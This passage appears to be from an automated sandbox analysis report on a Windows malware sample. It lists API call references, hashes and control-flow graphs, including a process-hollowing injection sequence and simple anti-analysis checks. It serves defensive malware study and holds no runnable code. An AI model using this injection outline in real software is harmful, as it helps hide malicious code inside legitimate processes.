                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID:
                • API String ID: 1783060780-0
                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction ID: 72415cc02d1db8c97febefdee7c2c61bf6871d87d7e8fc47f85e94328eb5aa7b
                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction Fuzzy Hash: 3CA15CB1C00259ABEF11EFE5CC49BDEBB76AF14308F140029D506762D1D7B65A88CFA6
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction ID: f5e9956a1586819e0d0f1eb6c686a52c39df1e1a7507461510019a42994f892d
                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction Fuzzy Hash: D2517D70A042069BDB29CE7989C866FB7B6AF40324F14863BEC25962D0D7B09AD1CB40
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction ID: 7fc76be4f533abd212cf5425c13b859c9203659f93351ddc8534f6644513f51f
                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction Fuzzy Hash: 0F11437200024ABBCF125F85CC41CEE3F72BF19354B598426FE1869171D73ACA72AB86
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: d3c52595e467dac83fae333621b244b68413b82c4c47e2b4a8fadfd2e7960bcf
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: 82016D3200015ABBDF125E86CD018EE3F63BF18344B888416FA1C98521D372C5B6AB81
                APIs
                • ___BuildCatchObject.LIBCMT ref: 024A7A4B
                  • Part of subcall function 024A8140: ___BuildCatchObjectHelper.LIBCMT ref: 024A8172
                  • Part of subcall function 024A8140: ___AdjustPointer.LIBCMT ref: 024A8189
                • _UnwindNestedFrames.LIBCMT ref: 024A7A62
                • ___FrameUnwindToState.LIBCMT ref: 024A7A74
                • CallCatchBlock.LIBCMT ref: 024A7A98
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: d3801156a27bfb77e5336d6110f5d8c170a13eb1bc29203201024e3f5cccaa1b
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 1D01D732000109BBCF22AF56CC10EDF7BAAEF58754F15811AFA1965220D732E9A1DFA4

                Execution Graph

                Execution Coverage:1.1%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:39
                Total number of Limit Nodes:8
                execution_graph 33584 22fe026 33585 22fe035 33584->33585 33588 22fe7c6 33585->33588 33594 22fe7e1 33588->33594 33589 22fe7ea CreateToolhelp32Snapshot 33590 22fe806 Module32First 33589->33590 33589->33594 33591 22fe03e 33590->33591 33592 22fe815 33590->33592 33595 22fe485 33592->33595 33594->33589 33594->33590 33596 22fe4b0 33595->33596 33597 22fe4f9 33596->33597 33598 22fe4c1 VirtualAlloc 33596->33598 33597->33597 33598->33597 33599 2390000 33602 2390630 33599->33602 33601 2390005 33603 239064c 33602->33603 33605 2391577 33603->33605 33608 23905b0 33605->33608 33611 23905dc 33608->33611 33609 239061e 33610 23905e2 GetFileAttributesA 33610->33611 33611->33609 33611->33610 33613 2390420 33611->33613 33614 23904f3 33613->33614 33615 23904fa 33614->33615 33616 23904ff CreateWindowExA 33614->33616 33615->33611 33616->33615 33617 2390540 PostMessageA 33616->33617 33618 239055f 33617->33618 33618->33615 33620 2390110 VirtualAlloc 33618->33620 33621 239016e 33620->33621 33622 2390414 33621->33622 33623 239024a CreateProcessA 33621->33623 33622->33618 33623->33622 33624 239025f VirtualFree VirtualAlloc Wow64GetThreadContext 33623->33624 33624->33622 33625 23902a9 ReadProcessMemory 33624->33625 33626 23902e5 VirtualAllocEx NtWriteVirtualMemory 33625->33626 33627 23902d5 NtUnmapViewOfSection 33625->33627 33628 239033b 33626->33628 33627->33626 33629 239039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33628->33629 33630 2390350 NtWriteVirtualMemory 33628->33630 33631 23903fb ExitProcess 33629->33631 33630->33628

                Control-flow Graph

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02390156
                • CreateProcessA.KERNELBASE(?,00000000), ref: 02390255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02390270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02390283
                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0239029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023902C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 023902E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02390304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0239032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02390399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023903BF
                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 023903E1
                • ResumeThread.KERNELBASE(00000000), ref: 023903ED
                • ExitProcess.KERNEL32(00000000), ref: 02390412
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFreeReadResumeSectionUnmapView
                • String ID:
                • API String ID: 3993611425-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: fb171e11ece74f7a4c45e7ed77955ddbdc2061a11152acc531fc5a584743f4d0
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: 94B1C674A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB391D771AE41CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 16 2390420-23904f8 18 23904fa 16->18 19 23904ff-239053c CreateWindowExA 16->19 20 23905aa-23905ad 18->20 21 239053e 19->21 22 2390540-2390558 PostMessageA 19->22 21->20 23 239055f-2390563 22->23 23->20 24 2390565-2390579 23->24 24->20 26 239057b-2390582 24->26 27 23905a8 26->27 28 2390584-2390588 26->28 27->23 28->27 29 239058a-2390591 28->29 29->27 30 2390593-2390597 call 2390110 29->30 32 239059c-23905a5 30->32 32->27
                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02390533
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: b68bdcfdf82114da697393975a413de1c1a350e7417259a9bf2fd38fe91cdfdc
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: AB511770D08388DAEF15CBE8C849BEDBFB6AF11708F144058D5487F286C3BA5659CB66

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 33 23905b0-23905d5 34 23905dc-23905e0 33->34 35 239061e-2390621 34->35 36 23905e2-23905f5 GetFileAttributesA 34->36 37 2390613-239061c 36->37 38 23905f7-23905fe 36->38 37->34 38->37 39 2390600-239060b call 2390420 38->39 41 2390610 39->41 41->37
                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 023905EC
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: fbfe33498059ec561b852af1d2b48702ef09029b01877b067966fe6bafe741aa
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: 68012170C0425CEEDF14DB98C5183AEBFB5AF42308F1480DDC4592B242D7769B58CBA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 42 22fe7c6-22fe7df 43 22fe7e1-22fe7e3 42->43 44 22fe7ea-22fe7f6 CreateToolhelp32Snapshot 43->44 45 22fe7e5 43->45 46 22fe7f8-22fe7fe 44->46 47 22fe806-22fe813 Module32First 44->47 45->44 46->47 54 22fe800-22fe804 46->54 48 22fe81c-22fe824 47->48 49 22fe815-22fe816 call 22fe485 47->49 52 22fe81b 49->52 52->48 54->43 54->47
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 022FE7EE
                • Module32First.KERNEL32(00000000,00000224), ref: 022FE80E
                Memory Dump Source
                • Source File: 00000006.00000002.1282127310.00000000022FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 022FE000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_22fe000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: 1933e7d4b138c9f559de02fd8b2c6aecc350747bd78157e72dfc82b79b6893e9
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: 60F0F6312103116FD7613BF4A88CBAEB6ECAF48625F110238F742914E0CB70E8454A61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 55 22fe485-22fe4bf call 22fe798 58 22fe50d 55->58 59 22fe4c1-22fe4f4 VirtualAlloc call 22fe512 55->59 58->58 61 22fe4f9-22fe50b 59->61 61->58
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 022FE4D6
                Memory Dump Source
                • Source File: 00000006.00000002.1282127310.00000000022FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 022FE000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_22fe000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: f4c6c3ad1fe6783be7f2f7f883fdac9d02ed10681edbaace3391c690117ff8ad
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: 61113F79A00208EFDB01DF98C985E99BFF5AF08750F0580A4FA489B361D375EA50DF80

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 552 23b6437-23b6440 553 23b6442-23b6446 552->553 554 23b6466 552->554 553->554 556 23b6448-23b6459 call 23b9636 553->556 555 23b6468-23b646b 554->555 559 23b645b-23b6460 call 23b5ba8 556->559 560 23b646c-23b647d call 23b9636 556->560 559->554 565 23b6488-23b649a call 23b9636 560->565 566 23b647f-23b6480 call 23b158d 560->566 571 23b64ac-23b64cd call 23b5f4c call 23b6837 565->571 572 23b649c-23b64aa call 23b158d * 2 565->572 569 23b6485-23b6486 566->569 569->559 581 23b64cf-23b64dd call 23b557d 571->581 582 23b64e2-23b6500 call 23b158d call 23b4edc call 23b4d82 call 23b158d 571->582 572->569 587 23b64df 581->587 588 23b6502-23b6505 581->588 590 23b6507-23b6509 582->590 587->582 588->590 590->555
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                • String ID:
                • API String ID: 1442030790-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: 955a8ff7283d8868fa00e569a2839599ac4b8e51a3db8c02b451a7e3a2961627
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: C521D875204A00AEE7337F65DC02ECB7BDEDF41760F50802AE78995CA6EB628550CF61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 596 23b3f16-23b3f2f 597 23b3f49-23b3f5e call 23bbdc0 596->597 598 23b3f31-23b3f3b call 23b5ba8 call 23b4c72 596->598 597->598 604 23b3f60-23b3f63 597->604 605 23b3f40 598->605 606 23b3f77-23b3f7d 604->606 607 23b3f65 604->607 608 23b3f42-23b3f48 605->608 611 23b3f89-23b3f9a call 23c0504 call 23c01a3 606->611 612 23b3f7f 606->612 609 23b3f6b-23b3f75 call 23b5ba8 607->609 610 23b3f67-23b3f69 607->610 609->605 610->606 610->609 620 23b3fa0-23b3fac call 23c01cd 611->620 621 23b4185-23b418f call 23b4c9d 611->621 612->609 615 23b3f81-23b3f87 612->615 615->609 615->611 620->621 626 23b3fb2-23b3fbe call 23c01f7 620->626 626->621 629 23b3fc4-23b3fcb 626->629 630 23b403b-23b4046 call 23c02d9 629->630 631 23b3fcd 629->631 630->608 638 23b404c-23b404f 630->638 633 23b3fcf-23b3fd5 631->633 634 23b3fd7-23b3ff3 call 23c02d9 631->634 633->630 633->634 634->608 639 23b3ff9-23b3ffc 634->639 640 23b407e-23b408b 638->640 641 23b4051-23b405a call 23c0554 638->641 642 23b413e-23b4140 639->642 643 23b4002-23b400b call 23c0554 639->643 644 23b408d-23b409c call 23c0f40 640->644 641->640 649 23b405c-23b407c 641->649 642->608 643->642 652 23b4011-23b4029 call 23c02d9 643->652 653 23b40a9-23b40d0 call 23c0e90 call 23c0f40 644->653 654 23b409e-23b40a6 644->654 649->644 652->608 659 23b402f-23b4036 652->659 662 23b40de-23b4105 call 23c0e90 call 23c0f40 653->662 663 23b40d2-23b40db 653->663 654->653 659->642 668 23b4113-23b4122 call 23c0e90 662->668 669 23b4107-23b4110 662->669 663->662 672 23b414f-23b4168 668->672 673 23b4124 668->673 669->668 676 23b413b 672->676 677 23b416a-23b4183 672->677 674 23b412a-23b4138 673->674 675 23b4126-23b4128 673->675 674->676 675->674 678 23b4145-23b4147 675->678 676->642 677->642 678->642 679 23b4149 678->679 679->672 680 23b414b-23b414d 679->680 680->642 680->672
                APIs
                • _memset.LIBCMT ref: 023B3F51
                  • Part of subcall function 023B5BA8: __getptd_noexit.LIBCMT ref: 023B5BA8
                • __gmtime64_s.LIBCMT ref: 023B3FEA
                • __gmtime64_s.LIBCMT ref: 023B4020
                • __gmtime64_s.LIBCMT ref: 023B403D
                • __allrem.LIBCMT ref: 023B4093
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023B40AF
                • __allrem.LIBCMT ref: 023B40C6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023B40E4
                • __allrem.LIBCMT ref: 023B40FB
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023B4119
                • __invoke_watson.LIBCMT ref: 023B418A
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                • String ID:
                • API String ID: 384356119-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: 8ad5c5055cc9c4108c035e2f0c7d8512a40fe0a63b2042a7333f2feeac08493d
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: 2B711671E00716BBE725DE78CC50BEAB3B9AF10764F14427AE714E7A81E770DA408B94

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                • String ID:
                • API String ID: 3432600739-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: 7ae7847b92c9effc48de75fb59b915dd92e8e2e865a11d3788ed94a89473ffcd
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: F4412332904304AFDB22AFB4DD86BDE7BEAAF48314F10402EEB0496992CB759644DF15

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 745 23b84ab-23b84d9 call 23b8477 750 23b84db-23b84de 745->750 751 23b84f3-23b850b call 23b158d 745->751 752 23b84ed 750->752 753 23b84e0-23b84eb call 23b158d 750->753 758 23b850d-23b850f 751->758 759 23b8524-23b855a call 23b158d * 3 751->759 752->751 753->750 753->752 760 23b851e 758->760 761 23b8511-23b851c call 23b158d 758->761 770 23b856b-23b857e 759->770 771 23b855c-23b8562 759->771 760->759 761->758 761->760 776 23b858d-23b8594 770->776 777 23b8580-23b8587 call 23b158d 770->777 771->770 772 23b8564-23b856a call 23b158d 771->772 772->770 779 23b85a3-23b85ae 776->779 780 23b8596-23b859d call 23b158d 776->780 777->776 781 23b85cb-23b85cd 779->781 782 23b85b0-23b85bc 779->782 780->779 782->781 786 23b85be-23b85c5 call 23b158d 782->786 786->781
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$ExitProcess___crt
                • String ID:
                • API String ID: 1022109855-0
                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction ID: 2b5ec1c454cf376b0cfec392202b1d4ce353f16f4a3b7bfc1094a6e72113b194
                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction Fuzzy Hash: 27318471900254DBCB226F54FC848C977AAFF14325704862BEB49976A0CBF459C9AFA4
                APIs
                • std::exception::exception.LIBCMT ref: 023DFC1F
                  • Part of subcall function 023C169C: std::exception::_Copy_str.LIBCMT ref: 023C16B5
                • __CxxThrowException@8.LIBCMT ref: 023DFC34
                • std::exception::exception.LIBCMT ref: 023DFC4D
                • __CxxThrowException@8.LIBCMT ref: 023DFC62
                • std::regex_error::regex_error.LIBCPMT ref: 023DFC74
                  • Part of subcall function 023DF914: std::exception::exception.LIBCMT ref: 023DF92E
                • __CxxThrowException@8.LIBCMT ref: 023DFC82
                • std::exception::exception.LIBCMT ref: 023DFC9B
                • __CxxThrowException@8.LIBCMT ref: 023DFCB0
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                • String ID: leM
                • API String ID: 3569886845-2926266777
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: edcc39864c5fb64672457d7b5d7a682da2621578dcff257213dd35f3eab76894
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: 60112879C0420DBBCF00FFA5D855CEEBBBDAA04344F50856AAD5897241EB78A7488F94
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$_sprintf
                • String ID:
                • API String ID: 3721157643-0
                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction ID: 67e6bfe499e82b4b1289c8c6739e8f56f9b270297d1f37d0c335df4d111a2f83
                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction Fuzzy Hash: 5911E4B29005546AC773AAB55C21FFF7ADD9F46702F0401AAFF8CD1580DB585A049BB1
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                • String ID:
                • API String ID: 65388428-0
                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction ID: 2ffef3801faac32c543e1b46e4b5e42a36be07d96e291d3df2e40cad6b6cfc41
                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction Fuzzy Hash: D4514F71D40219ABDB21DFA5DC85FEFBBB9FF04744F100029FA49B6180EB745A058BA5
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 74a59e5aa218c26a14c6773fd546bed4490a31ceddff03df434057600b8b3d6d
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: 78515FB1D40209AADF11DFA1DC86FEEBB79EF05704F200129F905F6580D7B9AA058BA5
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: 5755f0cd54266b7629ff61af86eaa088d8ab57cff7987f54b850bb75b1782413
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: 8F514071D40209ABDF21DFA5DC46FEEBBB9EF05704F200129F905F6280E775AA058BA4
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                • String ID:
                • API String ID: 3534693527-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 1629e8845244721d1774fc82e85742264fd9e439b0b12385dd7a4e61b2039061
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: 99310673A042216FDB32AF64EC00BAF77A99F05B24F508415EF14EB686DB74C541CBA1
                APIs
                • __getptd_noexit.LIBCMT ref: 024566DD
                  • Part of subcall function 023B59BF: __calloc_crt.LIBCMT ref: 023B59E2
                  • Part of subcall function 023B59BF: __initptd.LIBCMT ref: 023B5A04
                • __calloc_crt.LIBCMT ref: 02456700
                • __get_sys_err_msg.LIBCMT ref: 0245671E
                • __invoke_watson.LIBCMT ref: 0245673B
                • __get_sys_err_msg.LIBCMT ref: 0245676D
                • __invoke_watson.LIBCMT ref: 0245678B
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                • String ID:
                • API String ID: 4066021419-0
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: 498e66b0aa16fb9035743dd9b1d68daf452855ca065b3205d8d05978bd896177
                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: E611C8716016247BEB326E25DC00BAB739DDF00B61F810427FF8496742EB31DD404AE4
                APIs
                Strings
                Memory Dump Source
